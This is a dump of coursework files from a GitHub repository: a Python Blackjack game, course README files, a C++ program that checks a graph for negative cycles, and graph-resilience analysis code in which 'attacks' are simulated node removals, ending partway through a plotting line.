"num_lines": 198,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project6 Blackjack/BlackJack.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #6 - Blackjack\n\nimport simplegui\nimport random\n\n# load card sprite - 936x384 - source: jfitz.com\nCARD_SIZE = (72, 96)\nCARD_CENTER = (36, 48)\ncard_images = simplegui.load_image(\"http://storage.googleapis.com/codeskulptor-assets/cards_jfitz.png\")\n\nCARD_BACK_SIZE = (72, 96)\nCARD_BACK_CENTER = (36, 48)\ncard_back = simplegui.load_image(\"http://storage.googleapis.com/codeskulptor-assets/card_jfitz_back.png\") \n\nCANVAS_WIDTH = 600\nCANVAS_HEIGHT = 600\n\n# initialize some useful global variables\nin_play = False\noutcome = \"\"\nscore = 0\n\n# define globals for cards\nSUITS = ('C', 'S', 'H', 'D')\nRANKS = ('A', '2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K')\nVALUES = {'A':1, '2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8, '9':9, 'T':10, 'J':10, 'Q':10, 'K':10}\n\n\n# define card class\nclass Card:\n def __init__(self, suit, rank):\n if (suit in SUITS) and (rank in RANKS):\n self.suit = suit\n self.rank = rank\n else:\n self.suit = None\n self.rank = None\n print \"Invalid card: \", suit, rank\n\n def __str__(self):\n return self.suit + self.rank\n\n def get_suit(self):\n return self.suit\n\n def get_rank(self):\n return self.rank\n\n def draw(self, canvas, pos):\n card_loc = (CARD_CENTER[0] + CARD_SIZE[0] * RANKS.index(self.rank), \n CARD_CENTER[1] + CARD_SIZE[1] * SUITS.index(self.suit))\n canvas.draw_image(card_images, card_loc, CARD_SIZE, [pos[0] + CARD_CENTER[0], pos[1] + CARD_CENTER[1]], CARD_SIZE)\n \n# define hand class\nclass Hand:\n def __init__(self):\n self.listOfCards = [] # create a hand object\n\n def __str__(self):\n s = \"Hand contains: \"\n for card in self.listOfCards:\n s += str(card) + \" \" \n return s\t# return a string representation of a hand\n\n def add_card(self, card):\n self.listOfCards.append(card)\t# add a card object to a hand\n\n def get_value(self):\n # count aces as 1, if the hand has an ace, then add 10 to hand value if it doesn't bust\n hand_value = 0\n ace_present = False\n \n for card in self.listOfCards:\n hand_value += VALUES[card.rank]\n if (card.rank == RANKS[0]):\n ace_present = True\n \n if (ace_present):\n if (hand_value + 10 <= 21):\n hand_value += 10 \n \n return hand_value\n \n def draw(self, canvas, pos):\n i = 0\n for card in self.listOfCards:\n card.draw(canvas, (pos[0] + i * (CARD_SIZE[0]+10), pos[1]))\n i += 1\n\n \n# define deck class \nclass Deck:\n def __init__(self):\n # create a Deck object\n self.deckOfCards = [Card(suit,rank) for suit in SUITS for rank in RANKS]\n \n def shuffle(self):\n # shuffle the deck \n random.shuffle(self.deckOfCards) \n \n def deal_card(self):\n return self.deckOfCards.pop()\t# deal a card object from the deck\n \n def __str__(self):\n s = \"Deck Contains: \"\n for card in self.deckOfCards:\n s += str(card) + \" \" \n return s\t# return a string representation of a hand\n\n#define event handlers for buttons\ndef deal():\n global outcome, in_play, player_hand, dealer_hand, deck, message, score\n \n if (in_play):\n outcome = \"Game forfeited. You loose\"\n score -= 1\n in_play = False\n message = \"New Deal?\"\n else: \n deck = Deck() # create the deck object with cards\n deck.shuffle() # shuffle the cards inside the deck\n\n player_hand = Hand() # create a hand for the player\n dealer_hand = Hand() # create a hand for the dealer\n # give two cards to both player and the dealier\n player_hand.add_card(deck.deal_card())\n dealer_hand.add_card(deck.deal_card())\n player_hand.add_card(deck.deal_card())\n dealer_hand.add_card(deck.deal_card())\n \n outcome = \"\"\n message = \"Hit or stand?\" \n in_play = True\n\ndef hit():\n global outcome, in_play, player_hand, deck, score, message\n # if the hand is in play, hit the player\n if (in_play):\n player_hand.add_card(deck.deal_card())\n if (player_hand.get_value() > 21):\n # if busted, assign a message to outcome, update in_play and score\n outcome = \"You have busted!\"\n message = \"New Deal?\"\n in_play = False\n score -= 1 \n \ndef stand():\n global outcome, in_play, player_hand, dealer_hand, deck, score, message\n \n # if hand is in play, repeatedly hit dealer until his hand has value 17 or more\n if(in_play):\n while dealer_hand.get_value() < 17:\n dealer_hand.add_card(deck.deal_card())\n \n if (dealer_hand.get_value() > 21):\n outcome = \"Dealer Busted. You Win\"\n score += 1\n elif (dealer_hand.get_value() >= player_hand.get_value()):\n outcome = \"You Loose\"\n score -= 1\n else:\n outcome = \"You Win\"\n score += 1\n \n in_play = False\n message = \"New Deal?\"\n\n# draw handler \ndef draw(canvas):\n # test to make sure that card.draw works, replace with your code below\n canvas.draw_text(\"Black Jack\", (CANVAS_WIDTH/4, CANVAS_HEIGHT/12), 30, 'cyan')\n \n canvas.draw_text(message, (CANVAS_WIDTH/2 - 50, CANVAS_HEIGHT*3/4 - CARD_SIZE[1]-20), 30, 'Black')\n canvas.draw_text(outcome, (CANVAS_WIDTH/2 - 50, CANVAS_HEIGHT/2 - CARD_SIZE[1]-20), 30, 'Black')\n canvas.draw_text(\"Score \" + str(score), (CANVAS_WIDTH/2+50, CANVAS_HEIGHT/12), 30, 'Black')\n \n canvas.draw_text(\"Dealer\", (CANVAS_WIDTH/5 - CARD_SIZE[0], CANVAS_HEIGHT/2 - CARD_SIZE[1]-20), 30, 'Black')\n dealer_hand.draw(canvas, (CANVAS_WIDTH/5 - CARD_SIZE[0], CANVAS_HEIGHT/2 - CARD_SIZE[1]))\n \n if (in_play):\n canvas.draw_image(card_back, CARD_BACK_CENTER, CARD_BACK_SIZE, (CANVAS_WIDTH/5-CARD_CENTER[0], CANVAS_HEIGHT/2-CARD_CENTER[1]), CARD_BACK_SIZE)\n \n canvas.draw_text(\"Player\", (CANVAS_WIDTH/5 - CARD_SIZE[0], CANVAS_HEIGHT*3/4 - CARD_SIZE[1]-20), 30, 'Black')\n player_hand.draw(canvas, (CANVAS_WIDTH/5 - CARD_SIZE[0], CANVAS_HEIGHT*3/4 - CARD_SIZE[1]))\n \n# initialization frame\nframe = simplegui.create_frame(\"Blackjack\", CANVAS_WIDTH, CANVAS_HEIGHT)\nframe.set_canvas_background(\"Green\")\n\n# create buttons and canvas callback\nframe.add_button(\"Deal\", deal, 200)\nframe.add_button(\"Hit\", hit, 200)\nframe.add_button(\"Stand\", stand, 200)\nframe.set_draw_handler(draw)\n\n# get things rolling\ndeal()\nframe.start()\n"
},
{
"alpha_fraction": 0.7464788556098938,
"alphanum_fraction": 0.7887324094772339,
"avg_line_length": 140,
"blob_id": "5e7cd307b73e84c4ac4ed692d53235baead579fb",
"content_id": "721304848979cf93b67ad09ddf5f360422356abb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 1,
"path": "/Algorithms on Graphs/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Algorithms on Graphs by University of California, San Diego & Higher School of Economics on Coursera. Certificate earned on July 22, 2016. \n"
},
{
"alpha_fraction": 0.7687763571739197,
"alphanum_fraction": 0.7780590653419495,
"avg_line_length": 146.625,
"blob_id": "9ff6abd6b398036f3edd4cfa3f28cafc2b6a7073",
"content_id": "66a45fc96b5bc2c57f02c0de37f69009e9af8b88",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1185,
"license_type": "no_license",
"max_line_length": 494,
"num_lines": 8,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project5 Memory/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #5 - Memory\n\nImplemented a simple version of the classic game, Memory, in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_xFyW39ljbJ_10.py) and press the play button on the top left corner. A window will pop up with a row of 16 cards. The purpose of the game is to find 8 matching pairs of cards in the shortest number of turns indicated on the left of the window.\n\nMini-project overview taken from course page can be found below:\n* Memory is a card game in which the player deals out a set of cards face down. In Memory, a turn (or a move) consists of the player flipping over two cards. If they match, the player leaves them face up. If they don't match, the player flips the cards back face down. The goal of Memory is to end up with all of the cards flipped face up in the minimum number of turns. For this project, we will keep our model for Memory fairly simple. A Memory deck consists of eight pairs of matching cards.\n\nComplete Mini-Project Description can be found at: <https://www.coursera.org/learn/interactive-python-2/supplement/lnYpa/mini-project-description>\n\n\n\n\n"
},
{
"alpha_fraction": 0.5793797373771667,
"alphanum_fraction": 0.598274827003479,
"avg_line_length": 35.4538459777832,
"blob_id": "21c1f2d7a91fdc30f3980871c04f50365b667c26",
"content_id": "89eb9c10c11dd34788aebbeb16afcc8b1c2d8b8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4879,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 130,
"path": "/Algorithms on Graphs/Assignment4/negative_cycle.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: negative_cycle.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-17\r\n// description: Problem 2 of the fourth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given an directed graph with possibly negative edge weights and with n vertices and m \r\n//\t\t\t\tedges, check whether it contains a cycle of negative weight.\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format i.e on the first line input the number of nodes n\r\n//\t\t\t\tedges m for the graph (put a space between the two). The next lines contains two vertices u and v and \r\n//\t\t\t\tthe value of the edge weight from u to v. \r\n//\r\n//\t\t\t\tOutput: Output 1 if the graph contains a cycle of negative weight and 0 otherwise.\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tnegative_cycle function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.09/2.00 sec, max memory used: 9.9/512 MB. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <limits>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n/*********************************************************************************\r\n// We use the following lemma to check if negative weight cycle exists in the graph\r\n//\t\t\tlemma: A graph G contains a negative cycle if and only if the nth \r\n//\t\t\t\t (additional) iteration of the Bellman-Ford algorithm updates\r\n//\t\t\t\t some distance values of dist vector above\r\n***********************************************************************************/\r\n\r\n// Uses Bellman-Ford algorithm to find whether a negative cycle exists in the graphs\r\n// \r\n// PRE: 1 ≤ n ≤ 10e3; 0 ≤ m ≤ 10e4; edge weights are integers of absolute value at most 10e3\r\n//\t\t(note that m = edges of directed graph adj and n = size of adj)\r\n// POST: return 1 if a negative cycle exists in the graph, 0 otherwise\r\n// PARAM: adj = directed graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t cost = adjacency list storing edge weights of all the edges leaving each vertice\r\n\r\n\r\nint negative_cycle(vector<vector<int> > &adj, vector<vector<int> > &cost) {\r\n\r\n\t// intialize a vector of pairs of int and bool where the first value represents the\r\n\t// current minimum distance to reach that vertice from s and second value stores a bool \r\n\t// that represent whether that vertice has been visited yet.\r\n\tvector<pair<int, bool>> dist(adj.size(), std::make_pair(0, false));\r\n\tdist[0].second = true;\r\n\tint i = 0;\r\n\t// Used for determining if the graph has a negative cycle\r\n\tbool flag;\r\n\r\n\t\r\n\t//Run Bellman-Ford Algorithm n times (i.e adj.size() times)\r\n\twhile ( i < adj.size()) {\r\n\r\n\t\r\n\t\tflag = false;\r\n\r\n\t\tfor (vector<int>::size_type u = 0; u < adj.size(); u++) {\r\n\t\t\tfor (vector<int>::size_type v = 0; v < adj[u].size(); v++) {\r\n\t\t\t\tif (dist[adj[u][v]].second == false || dist[adj[u][v]].first > dist[u].first + cost[u][v]) {\r\n\r\n\t\t\t\t\tdist[adj[u][v]].second = true;\r\n\t\t\t\t\tdist[adj[u][v]].first = dist[u].first + cost[u][v];\r\n\t\t\t\t\tflag = true;\r\n\t\t\t\t\r\n\r\n\t\t\t\t}\r\n\t\t\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\t//if during ith iteration of the Bellman-Ford algorithm, none of the distance values have been\r\n\t\t//updated, then there will also be no change to distance values during i+1 onward iterations and\r\n\t\t//therefore the graph does not contain a negative cycle. Return 0 in this case\r\n\t\tif (flag == false)\r\n\t\t\treturn 0;\r\n\r\n\t\t++i;\r\n\t}\r\n\r\n\t//if after n iterations, the flag is still true, then it means that distance values of some nodes have\r\n\t//been updated and the graph contains negative cycle. Therefore return 1.\r\n\r\n\treturn 1;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tint n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tvector<vector<int> > cost(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y, w;\r\n\t\tstd::cin >> x >> y >> w;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tcost[x - 1].push_back(w);\r\n\t}\r\n\tstd::cout << negative_cycle(adj, cost);\r\n\r\n\t// A test case to check if the negative_cycle function works. These are commented since the \r\n\t// assignment requires the negative_cycle.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\r\n\t//test 1\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tvector<vector<int> > cost1(4, vector<int>());\r\n\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tcost1[1 - 1].push_back(-5);\r\n\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tcost1[4 - 1].push_back(2);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tcost1[2 - 1].push_back(2);\r\n\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\tcost1[3 - 1].push_back(1);\r\n\r\n\tstd::cout << negative_cycle(adj1, cost1)<<std::endl; \r\n\r\n\t***********************************************************************************************/\r\n}\r\n"
},
{
"alpha_fraction": 0.6696315407752991,
"alphanum_fraction": 0.6709021329879761,
"avg_line_length": 33.977779388427734,
"blob_id": "61870c749eed86008e2d0db0d5e9ad51de61f9c6",
"content_id": "a24e49c0915c357e57a4f6a5935f246f642c35ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1574,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 45,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/alg_dpa.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAlgorithm to generate DPA graph \n\"\"\"\nimport deg_dis_for_graphs as deg_funcs\nimport alg_dpa_trial as dpa\n\ndef alg_dpa(n_nodes, m_nodes):\n \"\"\"\n Uses the DPA algorithm provided in Q3 of the Application\n to generates a random directed graph iteratively, where\n each iteration a new node is created, added to the graph,\n and connected to the subset of the existing node\n\n Arguments:\n n_nodes {integer} -- final number of nodes in the generated graph\n m_nodes {integer} -- number of existing nodes to which a new node is connected\n during each iteration\n\n Returns:\n dictionary -- the generated graph based on DPA algorithm\n \"\"\"\n\n # create a complete graph of m_nodes noes\n dpa_graph = deg_funcs.make_complete_graph(m_nodes)\n\n # create the DPA trial object corresponding to complete graph\n dpa_trial = dpa.DPATrial(m_nodes)\n\n # add each new ode to m_nodes from the existing graph randomly\n # chosen with probability:\n # (in-degree of new_node + 1) / (in-degree of all nodes +\n # total number of existing nodes)\n # simulated by the run_trial of the DPATrial class\n for new_node in range(m_nodes, n_nodes):\n # randomly select m_nodes from the existing graph that\n # the new_node will be connected to. Remove if any\n # duplicate nodes in the m_nodes selected\n neighbors = dpa_trial.run_trial(m_nodes)\n\n # update the existing graph to add this new node and its\n # neighbors\n dpa_graph[new_node] = neighbors\n\n\n return dpa_graph\n"
},
{
"alpha_fraction": 0.7735849022865295,
"alphanum_fraction": 0.7839622497558594,
"avg_line_length": 131.25,
"blob_id": "64fdb6b480985ff45df4ec2c5b796e08e6afea1a",
"content_id": "d7faf84d1630ffa661e801a2ed479dd702fd30d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1060,
"license_type": "no_license",
"max_line_length": 549,
"num_lines": 8,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project3 Stopwatch The Game/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #3 - \"StopWatch: The Game\"\n\nImplemented the game that using Timers in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_Kwifo40s54_7.py) and press the play button on the top left corner. A pop up window will appear and allow you start, stop, or reset the timer. The goal of the game is to stop the timer on a whole number. The number of correctly stopped timer attempts vs. the total number of attempts to stop the timer on whole number are printed on the top right corner of the window.\n\nMini-project overview taken from course page can be found below:\n* Our mini-project for this week will focus on combining text drawing in the canvas with timers to build a simple digital stopwatch that keeps track of the time in tenths of a second. The stopwatch should contain \"Start\", \"Stop\" and \"Reset\" buttons. \n\nComplete Mini-Project Description can be found at: <https://www.coursera.org/learn/interactive-python-1/supplement/MoH55/mini-project-description>\n\n\n"
},
{
"alpha_fraction": 0.6298292875289917,
"alphanum_fraction": 0.6352201104164124,
"avg_line_length": 33.8125,
"blob_id": "768aeeaa820ad24a2a3bd8d61c8b5cef273699e1",
"content_id": "89f0e3dee0eae989e9118df0c0b4f106d6bb5807",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1113,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 32,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/parse_graph.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCommon functions used for the both Application #1 and #2\n\"\"\"\n\ndef load_graph(graph_file):\n \"\"\"\n Helper function to solve Q1 Application #1: Analysis of\n Citation Graphs\n converts the text representation of a graph from\n a text file to dictionary representation. \n \n Arguments:\n graph_file {string} -- a file name of the file with text representation of a graph\n \n Returns:\n dictionary -- returns a dictionary representation of the graph\n \"\"\"\n # will store the dictionary representation of the graph\n graph = {}\n\n with open(graph_file) as grh_file:\n for line in grh_file:\n # get the tail node and corresponding head nodes in the current\n # line of the adjacency list text representation of graph\n nodes = line.split()\n # convert the head node string to integer\n head_nodes = map(int, nodes[1:])\n # add the key, the tail node, and value, the head nodes to the\n # dictionary representation of the graph\n graph[int(nodes[0])] = set(head_nodes)\n \n return graph"
},
{
"alpha_fraction": 0.7231942415237427,
"alphanum_fraction": 0.7323848009109497,
"avg_line_length": 45.92971420288086,
"blob_id": "c64b4b07f745180d60bc40911236cc04d59d6182",
"content_id": "28c3f9e2217688f8742893150830411a22171181",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14689,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 313,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 2/alg_application2_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSolutiion for Application #2: \"Analysis of a Computer Network\"\n\"\"\"\n\nimport time\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport alg_application2_provided as alg_app2_prov\nimport alg_example_graphs as alg_graphs\nimport alg_project2_solution as alg_proj2_sol\n\n##### Q1 Solution #####\n# To begin our analysis, we will examine the resilience of the computer network under \n# an attack in which servers are chosen at random. We will then compare the resilience \n# of the network to the resilience of ER and UPA graphs of similar size.\n#\n# To begin, you should determine the probability pp such that the ER graph computed \n# using this edge probability has approximately the same number of edges as the computer \n# network. (Your choice for pp should be consistent with considering each edge in the \n# undirected graph exactly once, not twice.) Likewise, you should compute an integer mm \n# such that the number of edges in the UPA graph is close to the number of edges in the \n# computer network. Remember that all three graphs being analyzed in this Application \n# should have the same number of nodes and approximately the same number of edges.\n\n# load the graph from a text file\ncnet_graph = alg_app2_prov.load_graph(alg_app2_prov.NETWORK_URL)\n\n# get the number of nodes in the computer network graph\nnum_nodes = len(cnet_graph.keys())\n\n# find the total number of edges in th computer network graph\nedges = sum([len(neighbors) for neighbors in cnet_graph.values()])/2\n\n# find the probability such that the ER graph computed using this edge \n# probability has approximately the same number of edges as the computer network\nprob_p = round(2.0 * edges / (num_nodes * (num_nodes - 1.0)), 6)\n\n# get the average degree so that the graph created using UPA algorithm has approximately \n# same number of edges as network_graph\nm_nodes = int(round(float(edges)/num_nodes))\n\n# generate the random graph based on ER algorithm\ner_graph = alg_graphs.alg_er(num_nodes, prob_p)\n\n# generate the random graph based on UPA algorithm\nupa_graph = alg_graphs.alg_upa(num_nodes, m_nodes)\n\n# Next, you should write a function random_order that takes a graph and returns a list \n# of the nodes in the graph in some random order. Then, for each of the three graphs \n# (computer network, ER, UPA), compute a random attack order using random_order and use \n# this attack order in compute_resilience to compute the resilience of the graph.\n\ndef random_order(graph):\n \"\"\"\n Take a graph a returns a random sequence of its nodes \n Arguments:\n graph {dictionary} -- [a graph]\n \n Returns:\n list of nodes -- random sequence of nodes\n \"\"\"\n\n lst_nodes = graph.keys()\n random.shuffle(lst_nodes)\n\n return lst_nodes\n\n# compute the resilience of each of the 3 graphs\ncnet_res = alg_proj2_sol.compute_resilience(cnet_graph, random_order(cnet_graph))\ner_res = alg_proj2_sol.compute_resilience(er_graph, random_order(er_graph))\nupa_res = alg_proj2_sol.compute_resilience(upa_graph, random_order(upa_graph))\n\n# Once you have computed the resilience for all three graphs, plot the results as three \n# curves combined in a single standard plot (not log/log). Use a line plot for each curve. \n# The horizontal axis for your single plot be the the number of nodes removed (ranging \n# from zero to the number of nodes in the graph) while the vertical axis should be the \n# size of the largest connect component in the graphs resulting from the node removal. \n# For this question (and others) involving multiple curves in a single plot, please \n# include a legend in your plot that distinguishes the three curves. The text labels in \n# this legend should include the values for pp and mm that you used in computing the ER \n# and UPA graphs, respectively. Both matplotlib and simpleplot support these capabilities \n# (matplotlib example and simpleplot example).\n# \n# Note that three graphs in this problem are large enough that using CodeSkulptor to \n# calculate compute_resilience for these graphs will take on the order of 3-5 minutes \n# per graph. When using CodeSkulptor, we suggest that you compute resilience for each \n# graph separately and save the results (or use desktop Python for this part of the \n# computation). You can then plot the result of all three calculations using simpleplot.\n# load the graph from the text file\n\n# compute the list of number of nodes removed (ranging from zero to the number of nodes in the graph)\nnum_removed = range(num_nodes + 1)\n\n# plot the graphs of resilience vs number of nodes removed for each of the 3 graphs\nplt.figure(0)\nplt.plot(num_removed, cnet_res, '-b', label = 'computer network')\nplt.plot(num_removed, er_res, '-r', label = 'ER graph p = 0.00397')\nplt.plot(num_removed, upa_res, '-k', label = 'UPA graph m = 2')\nplt.title('Graph resilience comparision for random attack')\nplt.xlabel('number of nodes removed')\nplt.ylabel('size of the largest connected component')\nplt.legend(loc = 'upper right')\nplt.xlim(0, None)\nplt.ylim(0, 1400)\nplt.grid()\n# uncommet to save the plot \n#plt.savefig(\"Q1_graph_resilience_comparision.png\")\n\n##### Q2 Solution #####\n# Consider removing a significant fraction of the nodes in each graph \n# using random_order. We will say that a graph is resilient under this \n# type of attack if the size of its largest connected component is \n# roughly (within ~25%) equal to the number of nodes remaining, after \n# the removal of each node during the attack.\n#\n# Examine the shape of the three curves from your plot in Question 1. \n# Which of the three graphs are resilient under random attacks as the \n# first 20% of their nodes are removed?\n#\n# Ans: all 3 graphs seem to be resilient, i.e the size of the largest \n# connected component is within 25% of 1000 ( the approximate number of\n# remaing nodes)\n\n##### Q3 Solution #####\n# In the next three problems, we will consider attack orders in which the \n# nodes being removed are chosen based on the structure of the graph. A \n# simple rule for thesetargeted attacks is to always remove a node of \n# maximum (highest) degree from the graph. The function targeted_order(ugraph) \n# in the provided code takes an undirected graph ugraph and iteratively does \n# the following:\n# \n# - Computes a node of the maximum degree in ugraph. If multiple nodes have \n# the maximum degree, it chooses any of them (arbitrarily).\n# - Removes that node (and its incident edges) from ugraph.\n#\n# Observe that targeted_order continuously updates ugraph and always computes \n# a node of maximum degree with respect to this updated graph. The output of \n# targeted_order is a sequence of nodes that can be used as input to compute_resilience.\n# \n# As you examine the code for targeted_order, you feel that the provided \n# implementation of targeted_order is not as efficient as possible. In \n# particular, much work is being repeated during the location of nodes \n# with the maximum degree. In this question, we will consider an alternative \n# method (which we will refer to as fast_targeted_order) for computing the \n# same targeted attack order. In Python, this method creates a list \n# degree_sets whose kth element is the set of nodes of degree k. The method \n# then iterates through the list degree_sets in order of decreasing degree. \n# When it encounter a non-empty set, the nodes in this set must be of \n# maximum degree. The method then repeatedly chooses a node from this set, \n# deletes that node from the graph, and updates degree_sets appropriately.\n# \n# For this question, your task is to implement fast_targeted_order and then \n# analyze the running time of these two methods on UPA graphs of size n with \n# m = 5. \n\n# Determine big-O bounds of the worst-case running times of targeted_order \n# and fast_targeted_order as a function of the number of nodes n in the UPA graph.\n# Since the number of edges in these UPA graphs is always less than 5n (due to the \n# choice of m = 5), your big-O bounds for both functions should be expressions in n. \n# You should also assume that the all of the set operations used in fast_targeted_order \n# are O(1).\n#\n# Ans: target_order = O(n^2 + m) = O(n^2) since for UPA graph m <= 5n (m = total \n# number of edges in UPA)\n# fast_target_order = O(n + m) = O(n) since for UPA graph m <= 5n (m = total\n# number of edges in UPA)\n\n# Next, run these two functions on a sequence of UPA graphs with n in range(10,1000,10) \n# and m=5 and use the time module (or your favorite Python timing utility) to compute \n# the running times of these functions. Then, plot these running times (vertical axis) \n# as a function of the number of nodes n (horizontal axis) using a standard plot \n# (not log/log). Your plot should consist of two curves showing the results of your \n# timings. Remember to format your plot appropriately and include a legend. The title \n# of your plot should indicate the implementation of Python (desktop Python vs. CodeSkulptor) \n# used to generate the timing results.\n\ndef fast_targeted_order(graph):\n \"\"\"\n Compute a targeted attack order consisting of nodes of \n maximal degree. The algorithm used was provided.\n\n Arguments:\n graph {dictionary} -- a graph\n \n Returns:\n list of nodes -- a list of nodes of attack order with maximal\n degree in descending order\n \"\"\"\n\n # intialize the list with the target node order\n node_order = []\n\n # make a copy of the node\n graph_cpy = alg_app2_prov.copy_graph(graph)\n\n # get all the nodes of the graph\n nodes = graph_cpy.keys()\n\n # initialize all degree set so that all degree corresponds to empty set of nodes\n degree_set = [set() for dummy_idx in nodes]\n\n # add all the nodes to their corresponding degree location\n for node in nodes:\n degree = len(graph_cpy[node])\n degree_set[degree].add(node)\n\n # update the degree set and delete the node of the copy of graph appropriately after \n # storing the node with current maximal degree \n for deg_set_idx in range(len(nodes) - 1, -1, -1):\n while(len(degree_set[deg_set_idx]) != 0):\n node_u = degree_set[deg_set_idx].pop()\n for neighbor in graph_cpy[node_u]:\n degree_neigbor = len(graph_cpy[neighbor])\n degree_set[degree_neigbor].remove(neighbor)\n degree_set[degree_neigbor - 1].add(neighbor) \n \n node_order.append(node_u)\n alg_app2_prov.delete_node(graph_cpy, node_u)\n\n\n return node_order\n\n# intialize the fast and normal function times for targeted order\ntime_fast_targeted_order = []\ntime_targeted_order = []\n\n# intialize the nodes to be used to generate the UPA graphs\nnodes = range(10, 1000, 10)\n\n# calcualte the time to run the normal and fast functions for the target order\nfor node in nodes:\n # create the UPA graph with n = node and m = 5 where m is the number of \n # existing nodes to which a new node is connected during each iteration\n upa_graph_new = alg_graphs.alg_upa(node, 5)\n # calculate the attack order based on normal targeted order function \n # and store the time it takes to run this function\n start = time.time()\n alg_app2_prov.targeted_order(upa_graph_new)\n end = time.time()\n time_targeted_order.append((end - start) * 1000)\n # calculate the attack order based on fast targeted order function \n # and store the time it takes to run this function\n start = time.time()\n fast_targeted_order(upa_graph_new)\n end = time.time()\n time_fast_targeted_order.append((end - start) * 1000)\n\n# plot the graphs of resilience vs number of nodes removed for each of the 3 graphs\nplt.figure(1)\nplt.plot(nodes, time_targeted_order, '-b', label = 'targeted_order')\nplt.plot(nodes, time_fast_targeted_order, '-k', label = 'fast_targeted_order')\nplt.title('regular vs fast runtime of targeted order in Visual Studio' )\nplt.xlabel('number of nodes of UPA graph for m = 5')\nplt.ylabel('run times[msec]')\nplt.legend(loc = 'upper left')\nplt.xlim(10, None)\nplt.ylim(0, None)\nplt.grid()\n# uncommet to save the plot \n#plt.savefig(\"Q3_targeted_order_time_comparision.png\")\n\n##### Q4 Solution #####\n# To continue our analysis of the computer network, we will examine its resilience \n# under an attack in which servers are chosen based on their connectivity. We will \n# again compare the resilience of the network to the resilience of ER and UPA graphs \n# of similar size.\n# \n# Using targeted_order (or fast_targeted_order), your task is to compute a targeted \n# attack order for each of the three graphs (computer network, ER, UPA) from Question 1. \n# Then, for each of these three graphs, compute the resilience of the graph using \n# compute_resilience. Finally, plot the computed resiliences as three curves (line plots) \n# in a single standard plot. As in Question 1, please include a legend in your plot that \n# distinguishes the three plots. The text labels in this legend should include the values \n# for p and m that you used in computing the ER and UPA graphs, respectively.\n\n# compute the target order for the 3 graph in Q1\ntar_order_cnet = fast_targeted_order(cnet_graph)\ntar_order_er = fast_targeted_order(er_graph)\ntar_order_upa = fast_targeted_order(upa_graph)\n\n# compute the resilience for the 3 graph using the targeted order\n# compute the resilience of each of the 3 graphs\ncnet_res = alg_proj2_sol.compute_resilience(cnet_graph, tar_order_cnet)\ner_res = alg_proj2_sol.compute_resilience(er_graph, tar_order_er)\nupa_res = alg_proj2_sol.compute_resilience(upa_graph, tar_order_upa)\n\n# plot the computer resilience for the targeted order for the 3 graph\nplt.figure(2)\nplt.plot(num_removed, cnet_res, '-b', label = 'computer network')\nplt.plot(num_removed, er_res, '-r', label = 'ER graph p = 0.00397')\nplt.plot(num_removed, upa_res, '-k', label = 'UPA 